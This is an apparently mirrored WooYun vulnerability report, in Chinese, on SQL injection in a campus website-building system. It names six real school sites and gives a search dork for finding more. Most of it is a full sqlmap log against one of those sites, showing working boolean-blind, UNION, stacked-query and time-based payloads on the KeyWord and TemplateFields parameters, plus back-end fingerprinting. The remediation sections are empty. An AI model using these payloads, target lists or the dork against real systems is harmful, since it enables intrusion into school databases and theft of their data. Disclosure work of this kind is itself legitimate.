某校园建站系统同一文件多处sql注入漏洞

来源

http://wooyun.org/bugs/wooyun-2015-0102740

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： sql ### 详细说明：使用量非常多 http://www.dlwsxx.com/ws2004/model/login1.asp http://www.fzjcxx.cn/ws2004/model/login1.asp http://www.nxyancgjzx.com/ws2004/model/login1.asp http://www.sgtjb.com/ws2004/model/login1.asp http://www.sdwhys.com/ws2004/model/login1.asp http://www.zjnksyzx.com:8801/ws2004/model/login1.asp 关键词：inurl:ws2004/Model/ ``` http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0 ``` ``` [22:27:15] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output directory [22:27:16] [INFO] testing connection to the target URL [22:27:16] [INFO] testing if the target URL is stable. This can take a couple of seconds [22:27:17] [INFO] target URL is stable [22:27:17] [INFO] testing if GET parameter 'KeyWord' is dynamic [22:27:17] [INFO] confirming that GET parameter 'KeyWord' is dynamic [22:27:17] [INFO] GET parameter 'KeyWord' is dynamic [22:27:17] [WARNING] heuristic (basic) test shows that GET parameter 'KeyWord' m ight not be injectable [22:27:17] [INFO] testing for SQL injection on GET parameter 'KeyWord' [22:27:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:27:19] [INFO] GET parameter 'KeyWord' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [22:27:20] [INFO] heuristic (extended) test shows that the back-end DBMS could b e 'Microsoft SQL Server' do you want to include all tests for 'Microsoft SQL Server' extending provided l evel (1) and risk (1)? [Y/n] y [22:27:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [22:27:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [22:27:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [22:27:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace (integer column)' [22:27:49] [INFO] testing 'MySQL inline queries' [22:27:49] [INFO] testing 'PostgreSQL inline queries' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [22:27:49] [INFO] testing 'Oracle inline queries' [22:27:49] [INFO] testing 'SQLite inline queries' [22:27:49] [INFO] testing 'MySQL > 5.0.11 stacked queries' [22:27:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [22:28:50] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Syba se stacked queries' injectable [22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [22:28:51] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Syba se AND time-based blind (heavy query)' injectable [22:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [22:28:51] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [22:28:51] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending t he range for current UNION query injection technique test [22:28:52] [INFO] target URL appears to have 2 columns in query [22:28:52] [WARNING] reflective value(s) found and filtering out [22:28:52] [WARNING] output with limited number of rows detected. Switching to p artial mode [22:28:52] [INFO] GET parameter 'KeyWord' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'KeyWord' is vulnerable. Do you want to keep testing the others (i f any)? [y/N] y [22:29:03] [INFO] testing if GET parameter 'TemplateFunctionMode' is dynamic [22:29:03] [INFO] confirming that GET parameter 'TemplateFunctionMode' is dynami c [22:29:03] [INFO] GET parameter 'TemplateFunctionMode' is dynamic [22:29:04] [WARNING] heuristic (basic) test shows that GET parameter 'TemplateFu nctionMode' might not be injectable [22:29:04] [INFO] testing for SQL injection on GET parameter 'TemplateFunctionMo de' [22:29:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:29:05] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD ER BY clause' [22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' [22:29:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [22:29:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [22:29:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [22:29:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' [22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' [22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace (integer column)' [22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl ause' [22:29:43] [INFO] testing 'MySQL inline queries' [22:29:44] [INFO] testing 'PostgreSQL inline queries' [22:29:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [22:29:44] [INFO] testing 'Oracle inline queries' [22:29:44] [INFO] testing 'SQLite inline queries' [22:29:44] [INFO] testing 'MySQL > 5.0.11 stacked queries' [22:29:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [22:29:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [22:29:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [22:29:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [22:29:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [22:29:48] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [22:29:49] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query - comment)' [22:29:49] [INFO] testing 'Oracle AND time-based blind' [22:29:50] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav y query)' [22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace' [22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace (heavy queries)' [22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses' [22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' [22:29:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' injection not exploitable with NULL values. Do you want to try with a random int eger value for option '--union-char'? [Y/n] y [22:29:55] [WARNING] if UNION based SQL injection is not detected, please consid er forcing the back-end DBMS (e.g. --dbms=mysql) [22:29:57] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns' [22:29:59] [WARNING] GET parameter 'TemplateFunctionMode' is not injectable [22:29:59] [INFO] testing if GET parameter 'TemplateFields' is dynamic [22:30:00] [INFO] confirming that GET parameter 'TemplateFields' is dynamic [22:30:00] [INFO] GET parameter 'TemplateFields' is dynamic [22:30:00] [INFO] heuristic (basic) test shows that GET parameter 'TemplateField s' might be injectable [22:30:00] [INFO] testing for SQL injection on GET parameter 'TemplateFields' [22:30:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [22:30:02] [INFO] GET parameter 'TemplateFields' seems to be 'Microsoft SQL Serv er/Sybase boolean-based blind - Parameter replace (original value)' injectable [22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace (integer column)' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl ause' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query - comment)' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav y query)' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace (heavy queries)' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' [22:30:05] [INFO] testing 'Generic UNION query (43) - 1 to 20 columns' [22:30:05] [INFO] checking if the injection point on GET parameter 'TemplateFiel ds' is a false positive GET parameter 'TemplateFields' is vulnerable. Do you want to keep testing the ot hers (if any)? [y/N] y [22:30:07] [INFO] testing if GET parameter 'SearchType' is dynamic [22:30:08] [WARNING] GET parameter 'SearchType' does not appear dynamic [22:30:08] [WARNING] heuristic (basic) test shows that GET parameter 'SearchType ' might not be injectable [22:30:08] [INFO] testing for SQL injection on GET parameter 'SearchType' [22:30:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD ER BY clause' [22:30:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' [22:30:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [22:30:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [22:30:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' [22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' [22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace (integer column)' [22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl ause' [22:30:16] [INFO] testing 'MySQL inline queries' [22:30:17] [INFO] testing 'PostgreSQL inline queries' [22:30:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [22:30:17] [INFO] testing 'Oracle inline queries' [22:30:17] [INFO] testing 'SQLite inline queries' [22:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries' [22:30:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [22:30:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [22:30:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [22:30:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [22:30:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [22:30:21] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [22:30:22] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query - comment)' [22:30:22] [INFO] testing 'Oracle AND time-based blind' [22:30:23] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav y query)' [22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace' [22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace (heavy queries)' [22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses' [22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' [22:30:24] [INFO] testing 'MySQL UNION query (43) - 1 to 10 columns' [22:30:27] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns' [22:30:29] [WARNING] GET parameter 'SearchType' is not injectable sqlmap identified the following injection points with a total of 483 HTTP(s) req uests: --- Place: GET Parameter: KeyWord Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: KeyWord=1' AND 8355=8355 AND 'pMth'='pMth&TemplateFunctionMode=32&T emplateFields=1&SearchType=0 Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: KeyWord=1' UNION ALL SELECT NULL,CHAR(113)+CHAR(121)+CHAR(120)+CHAR (120)+CHAR(113)+CHAR(84)+CHAR(115)+CHAR(100)+CHAR(109)+CHAR(90)+CHAR(83)+CHAR(99 )+CHAR(77)+CHAR(122)+CHAR(71)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)- - &TemplateFunctionMode=32&TemplateFields=1&SearchType=0 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: KeyWord=1'; WAITFOR DELAY '0:0:5'--&TemplateFunctionMode=32&Templat eFields=1&SearchType=0 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: KeyWord=1' AND 7937=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys users AS sys7) AND 'MUme'='MUme&TemplateFunctionMode=32&TemplateFields=1&SearchT ype=0 Place: GET Parameter: TemplateFields Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace ( original value) Payload: KeyWord=1&TemplateFunctionMode=32&TemplateFields=(SELECT (CASE WHEN (6562=6562) THEN 1 ELSE 6562*(SELECT 6562 FROM master..sysdatabases) END))&Sear chType=0 --- there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: KeyWord, type: Single quoted string (default) [1] place: GET, parameter: TemplateFields, type: Unescaped numeric [q] Quit > [22:30:32] [INFO] testing Microsoft SQL Server [22:30:32] [INFO] confirming Microsoft SQL Server [22:30:32] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [22:30:32] [INFO] fetched data logged to text files under 'C:\Users\Administrato r\.sqlmap\output\www.fzjcxx.cn' [*] shutting down at 22:30:32 ``` ### 漏洞证明：

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-0102740

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

某校园建站系统同一文件多处sql注入漏洞

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

某校园建站系统同一文件多处sql注入漏洞

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定